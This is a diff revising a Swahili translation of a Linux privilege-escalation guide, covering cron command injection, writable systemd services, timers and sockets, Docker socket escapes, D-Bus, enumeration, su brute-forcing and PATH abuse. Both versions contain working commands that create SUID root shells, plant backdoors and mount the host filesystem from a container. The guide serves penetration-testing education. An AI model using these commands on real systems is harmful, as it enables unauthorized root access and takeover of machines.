arithmetic context, mshambuliaji anaweza kuingiza command substitution $(...) ambayo itaendeshwa kama root wakati cron inapoendesha. -- Kwa nini inafanya kazi: Katika Bash, upanuzi hutokea kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, kisha word splitting na pathname expansion. Kwa hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inabadilishwa (kukamilisha amri), kisha nambari iliyobaki `0` inatumiwa kwa hesabu ili script iendelee bila makosa. +- Kwa nini inafanya kazi: Katika Bash, expansions hutokea kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. Hivyo value kama `$(/bin/bash -c 'id > /tmp/pwn')0` inabadilishwa kwanza (kukimbiza command), kisha nambari `0` iliyobaki inatumiwa kwa arithmetic ili script iendelee bila errors. -- Mfano wa kawaida wenye udhaifu: +- Typical vulnerable pattern: ```bash #!/bin/bash # Example: parse a log and "sum" a count field coming from the log @@ -367,30 +366,30 @@ while IFS=',' read -r ts user count rest; do done < /var/www/app/log/application.log ``` -- Ushambuliaji: Pata maandishi yanayodhibitiwa na mshambuliaji yandikwe kwenye log inayochambuliwa ili uwanja unaonekana kuwa nambari uweke command substitution na mwisho uwe na digit. Hakikisha amri yako haiongezi kitu kwenye stdout (au ilekeze) ili hisabati ibaki halali. +- Utekelezaji: Pata attacker-controlled text imeandikwa kwenye parsed log ili field inayofanana na nambari iwe na command substitution na ifunge kwa digit. Hakikisha command yako haitachapishi kwenye stdout (au uilekeze) ili arithmetic ibaki valid. ```bash # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim): $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0 # When the root cron parser evaluates (( total += count )), your command runs as root. ``` -### Kuandika upya script ya cron na symlink +### Cron script overwriting and symlink -Ikiwa unaweza **kuhariri script ya cron** inayotekelezwa na root, unaweza kupata shell kwa urahisi: +Ikiwa unaweza **can modify a cron script** executed by root, unaweza kupata shell kwa urahisi sana: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > #Wait until it is executed /tmp/bash -p ``` -Iwapo script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, labda inaweza kuwa ya msaada kufuta folder hiyo na **kuunda symlink folder kwa nyingine** inayohudumia script unayodhibiti. +Iwapo script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, inaweza kuwa muhimu kufuta folder hiyo na **kuunda folder ya symlink kwa nyingine** inayohudumia script unayodhibiti. ```bash ln -d -s ``` ### Cron jobs za mara kwa mara -Unaweza kufuatilia michakato ili kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Labda unaweza kuchukua fursa yake na escalate privileges. +Unaweza kufuatilia processes kutafuta processes zinazoendeshwa kila 1, 2 au 5 dakika. Labda unaweza kuchukua fursa yake na escalate privileges. -Kwa mfano, ili **kufuatilia kila 0.1s kwa dakika 1**, **kupanga kwa amri zilizotekelezwa kidogo** na kufuta amri zilizotekelezwa zaidi, unaweza kufanya: +Kwa mfano, ili **monitor every 0.1s during 1 minute**, **sort by less executed commands** na kufuta commands ambazo zimeendeshwa zaidi, unaweza kufanya: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` @@ -398,40 +397,40 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do ### Cron jobs zisizoonekana -Inawezekana kuunda cronjob kwa kuweka carriage return baada ya comment (bila newline character), na cron job itafanya kazi. Mfano (zingatia carriage return char): +Inawezekana kuunda cronjob kwa **kuweka carriage return baada ya comment** (bila newline character), na cron job itafanya kazi. Mfano (kumbuka carriage return char): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` ## Huduma -### Mafaili _.service_ yanayoweza kuandikwa +### Mafayela ya _.service_ yanayoweza kuandikwa -Angalia kama unaweza kuandika faili yoyote ya `.service`, ikiwa unaweza, unaweza **kuibadilisha** ili **itekeleze** **backdoor yako wakati** huduma inapo **anzishwa**, **irejeshwe** au **isimamishwe** (labda utahitaji kusubiri hadi mashine ianzishwe upya).\ -Kwa mfano, tengeneza backdoor yako ndani ya faili ya `.service` kwa **`ExecStart=/tmp/script.sh`** +Angalia kama unaweza kuandika faili yoyote ya `.service`; ikiwa unaweza, unaweza **kuibadilisha** ili **itekeleze** backdoor yako **wakati** huduma inapo**anzishwa**, **irudishwe** au **imiswe** (labda utahitaji kusubiri hadi mashine ipunguzwe na kuanzishwa tena).\ +Kwa mfano, tengeneza backdoor yako ndani ya faili ya .service kwa kutumia **`ExecStart=/tmp/script.sh`** -### Mabainari ya huduma yanayoweza kuandikwa +### Mafaili ya binari za huduma yanayoweza kuandikwa -Kumbuka kwamba ikiwa una **write permissions over binaries being executed by services**, unaweza kuyabadilisha kuwa backdoors ili wakati huduma zitakapotekelezwa tena backdoors zitatekelezwa. +Tambua kwamba ikiwa una **idhini za kuandika kwa binari zinazotekelezwa na huduma**, unaweza kuzibadilisha kuwa backdoors ili wakati huduma zitakaporudi kutekelezwa, backdoors zitatekelezwa. ### systemd PATH - Relative Paths -Unaweza kuona PATH inayotumika na **systemd** kwa: +Unaweza kuona PATH inayotumiwa na **systemd** kwa kutumia: ```bash systemctl show-environment ``` -Ikiwa utagundua kwamba unaweza **write** katika yoyote ya folda za njia hiyo, unaweza kuwa na uwezo wa **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** katika faili kama: +Iwapo utagundua kwamba unaweza **kuandika** katika yoyote ya folda za njia hiyo, huenda ukaweza **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** files kama: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` -Kisha, tengeneza **executable** yenye **jina lile lile kama relative path binary** ndani ya folda ya PATH ya systemd ambayo unaweza kuandika, na wakati service itapoombwa kutekeleza kitendo dhaifu (**Start**, **Stop**, **Reload**), yako **backdoor** itatekelezwa (watumiaji wasio na ruhusa kawaida hawawezi kuanzisha/kusimamisha services, lakini angalia kama unaweza kutumia `sudo -l`). +Kisha, tengeneza **executable** yenye **jina sawa na relative path binary** ndani ya folda ya PATH ya systemd unayoweza kuandika, na wakati service itaombwa kutekeleza hatua yenye udhaifu (**Start**, **Stop**, **Reload**), **backdoor** yako itatekelezwa (watumiaji wasio na ruhusa za juu kwa kawaida hawawezi kuanza/kusitisha services lakini angalia kama unaweza kutumia `sudo -l`). **Jifunze zaidi kuhusu services kwa kutumia `man systemd.service`.** ## **Timers** -**Timers** ni systemd unit files ambazo jina lao linaisha kwa `**.timer**` ambazo zinadhibiti faili au matukio ya `**.service**`. **Timers** zinaweza kutumika kama mbadala wa cron kwa kuwa zina msaada uliojengwa kwa matukio ya calendar time na matukio ya monotonic time na zinaweza kuendeshwa asynchronously. +**Timers** ni faili za unit za systemd ambazo majina yao yanahitimisha kwa `**.timer**` na zinadhibiti faili au matukio ya `**.service**`. **Timers** zinaweza kutumika kama mbadala ya cron kwa sababu zina msaada uliojengwa kwa matukio ya kalenda na matukio ya muda ya monotonic, na zinaweza kuendeshwa kwa asynchronous. Unaweza kuorodhesha timers zote kwa: ```bash @@ -439,58 +438,57 @@ systemctl list-timers --all ``` ### Timers zinazoweza kuandikwa -Ikiwa unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya systemd.unit zilizopo (kama `.service` au `.target`) +Ikiwa unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya vitu vya systemd.unit (kama `.service` au `.target`) ```bash Unit=backdoor.service ``` -Katika nyaraka unaweza kusoma ni nini Unit: +Katika nyaraka unaweza kusoma maana ya Unit: -> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (Angalia hapo juu.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. +> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. Kwa hivyo, ili kutumia vibaya ruhusa hii utahitaji: -- Pata unit ya systemd fulani (kama `.service`) ambayo inayoendesha **binary inayoweza kuandikwa** -- Pata unit nyingine ya systemd ambayo inayoendesha **relative path** na wewe una **idhini za kuandika** kwenye **systemd PATH** (ili kujifanya executable hiyo) +- Tafuta systemd unit fulani (kama a `.service`) ambayo ni **executing a writable binary** +- Tafuta systemd unit fulani ambayo ni **executing a relative path** na wewe una **writable privileges** over the **systemd PATH** (ili kuigiza executable hiyo) -Jifunze zaidi kuhusu timers kwa kutumia `man systemd.timer`. +Jifunze zaidi kuhusu timers kwa `man systemd.timer`. -### **Kuwawezesha Timer** +### **Kuwezesha Timer** -Ili kuwezesha timer unahitaji idhini za root na kutekeleza: +Ili kuwezesha timer unahitaji root privileges na kuendesha: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` -Kumbuka **timer** inawezeshwa kwa kuunda symlink kwake kwenye `/etc/systemd/system/.wants/.timer` +Note the **timer** inawezeshwa kwa kuunda symlink kwake kwenye `/etc/systemd/system/.wants/.timer` ## Sockets -Unix Domain Sockets (UDS) zinawezesha **process communication** kwenye mashine sawa au tofauti ndani ya model za client-server. Zinatumia faili za descriptor za Unix kwa mawasiliano kati ya kompyuta na zinawekwa kupitia faili za `.socket`. +Unix Domain Sockets (UDS) zinawezesha **process communication** kwenye mashine moja au tofauti ndani ya modeli za client-server. Zinatumia faili za descriptor za Unix kwa mawasiliano kati ya kompyuta na zinaanzishwa kupitia `.socket` files. -Sockets zinaweza kusanidiwa kwa kutumia faili za `.socket`. +Sockets zinaweza kusanidiwa kwa kutumia `.socket` files. -**Learn more about sockets with `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vinavyovutia vinaweza kusanidiwa: +**Jifunze zaidi kuhusu sockets kwa `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vinavyovutia vinaweza kusanidiwa: -- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti lakini kwa muhtasari zinatumika **kuonyesha wapi itasikiliza** socket (njia ya faili ya AF_UNIX socket, IPv4/6 na/au nambari ya port kusikiliza, nk.) -- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **instance ya service inazaliwa kwa kila connection inayokuja** na socket ya connection pekee ndiyo itapitishwa kwake. Ikiwa **false**, sockets zote zinazolisikilizwa zinapipitishwa kwa unit ya service iliyozinduliwa, na unit moja tu ya service inazaliwa kwa connections zote. Thamani hii haisikiliziwi kwa datagram sockets na FIFOs ambapo unit moja ya service inashughulikia trafiki yote inayokuja bila masharti. **Defaults to false**. Kwa sababu za utendaji, inashauriwa kuandika daemons mpya kwa njia inayofaa `Accept=no`. -- `ExecStartPre`, `ExecStartPost`: Zinachukua mistari ya amri moja au zaidi, ambayo zina **endeshwa kabla** au **baada** ya **sockets**/FIFOs zinazolisikilizwa **kuundwa** na kufungwa kwenye port, mtawaliwa. Tokeni ya kwanza ya mstari wa amri lazima iwe jina la faili lililo kamili (absolute filename), ikifuatiwa na hoja za mchakato. -- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zina **endeshwa kabla** au **baada** ya **sockets**/FIFOs zinazolisikilizwa **kufungwa** na kuondolewa, mtawaliwa. -- `Service`: Inaelezea jina la unit ya **service** **kuanzishwa** wakati wa **incoming traffic**. Mipangilio hii inaruhusiwa tu kwa sockets zilizo na Accept=no. Inakuwa default kwenye service inayoshikilia jina sawa na socket (kwa kubadilisha suffix). Katika hali nyingi, haitapaswa kuwa muhimu kutumia chaguo hili. +- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hizi chaguzi ni tofauti lakini muhtasari hutumika kuonyesha wapi itasikiliza socket (njia ya AF_UNIX socket file, IPv4/6 na/au nambari ya port kusikiliza, nk.) +- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **service instance huanzishwa kwa kila incoming connection** na socket ya connection pekee ndiyo inapitishwa kwake. Ikiwa **false**, sockets zote zinazolisikiliza zenyewe zina **pitishwa kwa started service unit**, na unit moja tu ya service huanzishwa kwa muunganisho wote. Thamani hii hairuhusiwi kwa datagram sockets na FIFOs ambapo service unit moja bila masharti inashughulikia trafiki zote zinazoingia. **Kwa chaguo-msingi ni false**. Kwa sababu za utendakazi, inapendekezwa kuandika daemons mpya kwa njia inayofaa kwa `Accept=no`. +- `ExecStartPre`, `ExecStartPost`: Zinachukua mistari ya amri moja au zaidi, ambazo **hutekelezwa kabla** au **baada** ya kusikiliza **sockets**/FIFOs kuundwa na ku-bound, mtawalia. Tokeni ya kwanza ya mstari wa amri lazima iwe jina la faili kamili (absolute filename), ikifuatiwa na vigezo kwa mchakato. +- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo **hutekelezwa kabla** au **baada** ya kusikiliza **sockets**/FIFOs kufungwa na kuondolewa, mtawalia. +- `Service`: Inaelezea jina la unit ya **service** **kuzinduliwa** kwenye **incoming traffic**. Mipangilio hii inaruhusiwa tu kwa sockets zenye Accept=no. Kwa kawaida, inarejea service yenye jina sawa na socket (ikiwa suffix imebadilishwa). Katika kesi nyingi, haitakuwa muhimu kutumia chaguo hili. ### Writable .socket files -Ikiwa utapata faili ya `.socket` inayoweza kuandikwa (writable) unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket haijaundwa. Kwa hivyo, **huenda utahitaji kusubiri hadi mashine iwe imeanzishwa upya.**\ -_Note that the system must be using that socket file configuration or the backdoor won't be executed_ +Ikiwa utapata faili `.socket` ambayo ni **writable**, unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket itakapoundwa. Kwa hivyo, **labda utahitaji kusubiri mpaka mashine ianze upya.**\ _Kumbuka mfumo lazima utumie mpangilio huo wa faili ya socket au backdoor haitatekelezwa_ ### Writable sockets -Ikiwa **utatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia kuhusu Unix Sockets na si kuhusu faili za config `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutekeleza exploit kwa udhaifu. +Ikiwa **utatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na si kuhusu faili za usanidi `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu. -### Orodhesha Unix Sockets +### Enumerate Unix Sockets ```bash netstat -a -p --unix ``` -### Muunganisho wa ghafi +### Muunganisho la raw ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket @@ -499,7 +497,7 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` -**Exploitation example:** +**Mfano wa Exploitation:** {{#ref}} @@ -508,48 +506,48 @@ socket-command-injection.md ### HTTP sockets -Kumbuka kuwa kunaweza kuwa na **sockets listening for HTTP requests** (_Sio kuhusu .socket files, bali faili zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa: +Kumbuka kwamba kunaweza kuwa na **sockets listening for HTTP** requests (_sio .socket files ninazozungumzia, bali faili zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` -Ikiwa socket **responds with an HTTP** request, basi unaweza **communicate** nayo na labda **exploit some vulnerability**. +Ikiwa socket **inajibu kwa ombi la HTTP**, basi unaweza **kuwasiliana** nayo na labda **exploit some vulnerability**. -### Docker Socket Inayoweza Kuandikwa +### Socket ya Docker inayoweza kuandikwa -The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available. +Socket ya Docker, mara nyingi hupatikana kwenye `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa kawaida, inaweza kuandikwa na mtumiaji `root` na wanachama wa kikundi cha `docker`. Kuwa na ruhusa ya kuandika kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipatikani. #### **Privilege Escalation with Docker CLI** -Ikiwa una write access kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo: +Ikiwa una ruhusa ya kuandika kwenye socket ya Docker, unaweza escalate privileges kwa kutumia amri zifuatazo: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` -Amri hizi zinakuruhusu kuendesha container ukiwa na ufikiaji wa root kwenye mfumo wa faili wa host. +Amri hizi zinakuwezesha kuendesha container ukiwa na root-level access kwenye filesystem ya host. #### **Kutumia Docker API Moja kwa Moja** -Katika matukio ambapo Docker CLI haipatikani, Docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`. +Katika kesi ambapo Docker CLI haipatikani, Docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`. -1. **List Docker Images:** Retrieve the list of available images. +1. **Orodhesha Docker Images:** Retrieve the list of available images. ```bash curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json ``` -2. **Create a Container:** Send a request to create a container that mounts the host system's root directory. +2. **Create a Container:** Tuma ombi la kuunda container ambayo inamount root directory ya mfumo wa host. ```bash curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create ``` -Start the newly created container: +Anzisha container iliyoundwa hivi punde: ```bash curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start ``` -3. **Attach to the Container:** Use `socat` to establish a connection to the container, enabling command execution within it. +3. **Attach to the Container:** Tumia `socat` kuanzisha muunganisho na container, kuwezesha utekelezaji wa amri ndani yake. ```bash socat - UNIX-CONNECT:/var/run/docker.sock @@ -559,11 +557,11 @@ Connection: Upgrade Upgrade: tcp ``` -Baada ya kuanzisha muunganisho wa `socat`, unaweza kutekeleza amri moja kwa moja ndani ya container ukiwa na ufikiaji wa root kwenye mfumo wa faili wa host. +Baada ya kuanzisha muunganisho wa `socat`, unaweza kutekeleza amri moja kwa moja ndani ya container ukiwa na root-level access kwenye filesystem ya host. -### Mengine +### Others -Kumbuka kwamba ikiwa una ruhusa za kuandika kwenye docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). Ikiwa [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +Kumbuka kwamba ikiwa una write permissions over the docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). Angalia **more ways to break out from docker or abuse it to escalate privileges** katika: @@ -574,7 +572,7 @@ docker-security/ ## Containerd (ctr) privilege escalation -Kama unagundua unaweza kutumia amri ya **`ctr`**, soma ukurasa ufuatao kwa sababu **you may be able to abuse it to escalate privileges**: +If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: {{#ref}} @@ -583,7 +581,7 @@ containerd-ctr-privilege-escalation.md ## **RunC** privilege escalation -Kama unagundua unaweza kutumia amri ya **`runc`**, soma ukurasa ufuatao kwa sababu **you may be able to abuse it to escalate privileges**: +If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: {{#ref}} @@ -592,15 +590,15 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus ni mfumo tata wa mawasiliano kati ya michakato (inter-Process Communication, IPC) unaowawezesha programu kuingiliana kwa ufanisi na kushiriki data. Umeundwa kwa kuzingatia mfumo wa kisasa wa Linux, ukitoa mfumo imara wa aina mbalimbali za mawasiliano ya programu. +D-Bus ni mfumo wa kisasa wa **inter-Process Communication (IPC)** unaowezesha programu kuwasiliana kwa ufanisi na kushiriki data. Umebuniwa kwa kuzingatia mfumo wa kisasa wa Linux, unatolewa muundo thabiti kwa aina mbalimbali za mawasiliano kati ya programu. -Mfumo ni wenye kubadilika, ukisaidia IPC ya msingi inayoboreshwa kubadilishana data kati ya michakato, kwa namna inayokumbusha UNIX domain sockets iliyoboreshwa. Zaidi ya hayo, husaidia kutangaza matukio au ishara, na hivyo kuimarisha muingiliano usio na mshono kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kusababisha mchezaji wa muziki kukaa kimya (mute), kuboresha uzoefu wa mtumiaji. Zaidi ya hayo, D-Bus inaunga mkono mfumo wa remote object, kurahisisha maombi ya huduma na miito ya methods kati ya programu, ikipunguza ugumu wa taratibu zilizokuwa ngumu hapo awali. +System hii ni yenye uwezo mkubwa, inasaidia IPC ya msingi inayoboreshwa kwa kubadilishana data kati ya processes, ikikumbusha **enhanced UNIX domain sockets**. Zaidi yake, husaidia kutangaza matukio au signals, ikikuza muunganisho usio na mshono kati ya vipengele vya mfumo. Kwa mfano, signal kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kuamsha music player kukaza kwa kimya (mute), kuboresha uzoefu wa mtumiaji. Zaidi ya hayo, D-Bus inaunga mkono mfumo wa remote object, kurahisisha service requests na method invocations kati ya programu, kuifanya michakato iliyokuwa ngumu kuwa rahisi. -D-Bus inafanya kazi kwa msingi wa **allow/deny model**, ikisimamia ruhusa za ujumbe (miito ya method, utoaji wa signal, n.k.) kulingana na jumla ya athari za sheria za sera zinazoendana. Sera hizi zinaelezea jinsi mwingiliano na bus utakavyofanyika, na zinaweza kumruhusu mtu kupata privilege escalation kupitia matumizi mabaya ya ruhusa hizi. +D-Bus inafanya kazi kwa kutumia mfano wa **allow/deny model**, ikisimamia ruhusa za ujumbe (method calls, signal emissions, nk.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinafafanua jinsi ya kuingiliana na bus, na zinaweza kuruhusu privilege escalation kupitia matumizi mabaya ya ruhusa hizi. -Mfano wa sera kama hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa kwa mtumiaji root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. +Mfano wa sera kama hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa kwa user root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. -Sera zisizo na mtumiaji au kundi maalum zinatumika kwa wote, wakati sera za muktadha wa "default" zinatumika kwa wale wote wasiokuwa wamefunikwa na sera maalum nyingine. +Sera ambazo hazina user au group maalum zinatumika kwa wote, wakati "default" context policies zinatumika kwa wote ambao hawajafunikwa na sera maalum zingine. ```xml @@ -609,7 +607,7 @@ Sera zisizo na mtumiaji au kundi maalum zinatumika kwa wote, wakati sera za mukt ``` -**Jifunze jinsi ya enumerate na exploit mawasiliano ya D-Bus hapa:** +**Jifunze jinsi ya kuorodhesha na exploit mawasiliano ya D-Bus hapa:** {{#ref}} @@ -618,9 +616,9 @@ d-bus-enumeration-and-command-injection-privilege-escalation.md ## **Mtandao** -Daima ni jambo la kuvutia kufanya enumerate mtandao na kubaini nafasi ya mashine. +Daima ni ya kuvutia kuorodhesha mtandao na kubaini nafasi ya mashine. -### Generic enumeration +### Uorodheshaji wa kawaida ```bash #Hostname, hosts and DNS cat /etc/hostname /etc/hosts /etc/resolv.conf @@ -643,24 +641,24 @@ cat /etc/networks #Files used by network services lsof -i ``` -### Bandari zilizo wazi +### Porti zilizo wazi -Kila mara angalia huduma za mtandao zinazokimbia kwenye mashine ambazo hukuweza kuingiliana nazo kabla ya kuipata: +Daima angalia huduma za mtandao zinazokimbia kwenye mashine ambazo hukuweza kuingiliana nazo kabla ya kupata ufikiaji wake: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` ### Sniffing -Angalia ikiwa unaweza sniff traffic. Ikiwa unaweza, unaweza kupata baadhi ya credentials. +Angalia ikiwa unaweza sniff traffic. Ikiwa unaweza, unaweza kuwa na uwezo wa kupata baadhi ya credentials. ``` timeout 1 tcpdump ``` -## Users +## Watumiaji -### Generic Enumeration +### Uorodhesaji wa Kawaida -Angalia wewe ni **nani**, ni **privileges** gani ulizonazo, ni **users** gani wako kwenye mfumo, ni yapi wanaweza **login** na ni yapi wana **root privileges:** +Angalia **nani** wewe ni, ni **uruhusa** zipi unazo, ni **watumiaji** gani wako kwenye mifumo, ni wale gani wanaweza **kuingia** na ni wale gani wana **uruhusa za root:** ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -684,21 +682,21 @@ gpg --list-keys 2>/dev/null ``` ### UID Kubwa -Baadhi ya matoleo ya Linux yaliathiriwa na hitilafu inayowawezesha watumiaji wenye **UID > INT_MAX** kuinua privileges. Taarifa zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ +Baadhi ya toleo za Linux ziliathiriwa na mdudu uliowaruhusu watumiaji wenye **UID > INT_MAX** kuinua ruhusa. Taarifa zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ **Exploit it** using: **`systemd-run -t /bin/bash`** -### Makundi +### Vikundi -Angalia kama wewe ni **mwanachama wa kikundi fulani** ambacho kinaweza kukupa root privileges: +Angalia kama wewe ni **mwanachama wa kundi fulani** ambacho kinaweza kukupa ruhusa za root: {{#ref}} interesting-groups-linux-pe/ {{#endref}} -### Clipboard +### Ubao wa kunakili -Angalia kama kuna kitu chochote cha kuvutia ndani ya clipboard (ikiwa inawezekana) +Angalia kama kuna kitu chochote cha kuvutia kipo ndani ya ubao wa kunakili (ikiwa inawezekana) ```bash if [ `which xclip 2>/dev/null` ]; then echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` @@ -709,33 +707,33 @@ echo "Highlighted text: "`xsel -o 2>/dev/null` else echo "Not found xsel and xclip" fi ``` -### Sera ya Nenosiri +### Sera ya Nywila ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` -### Nywila Zinazojulikana +### Nenosiri zinazojulikana -Ikiwa **unajua nenosiri lolote** la mazingira **jaribu kuingia kama kila mtumiaji** ukitumia nenosiri hilo. +Ikiwa unajua **nenosiri lolote** la mazingira, **jaribu kuingia kama kila mtumiaji** ukitumia nenosiri hilo. ### Su Brute -Ikiwa hautajali kusababisha kelele nyingi na binaries za `su` na `timeout` ziko kwenye kompyuta, unaweza kujaribu ku-brute-force mtumiaji ukitumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa parameter ya `-a` pia inajaribu ku-brute-force watumiaji. +Ikiwa hukujali kufanya kelele nyingi na `su` na `timeout` binaries zipo kwenye kompyuta, unaweza kujaribu brute-force mtumiaji kwa kutumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) yenye parameter `-a` pia hujaribu brute-force watumiaji. ## Matumizi mabaya ya PATH inayoweza kuandikwa ### $PATH -Ikiwa utagundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH** unaweza kuweza kupandisha ruhusa kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji mwingine (kama root ikiwezekana) na ambayo **haitachukuliwi kutoka kwenye folda iliyoko kabla** ya folda yako inayoweza kuandikwa katika $PATH. +Ikiwa unagundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH** unaweza kufanikiwa kupandisha privileges kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani itakayotekelezwa na mtumiaji mwingine (root ideally) na ambayo **haitachukuliwa kutoka kwa folda iliyoko kabla** ya folda yako inayoweza kuandikwa katika $PATH. ### SUDO and SUID -Unaweza kuruhusiwa kutekeleza amri fulani ukitumia sudo au zinaweza kuwa na suid bit. Angalia kwa kutumia: +Unaweza kuruhusiwa kutekeleza amri fulani kwa kutumia sudo au zinaweza kuwa na suid bit. Angalia kwa kutumia: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null 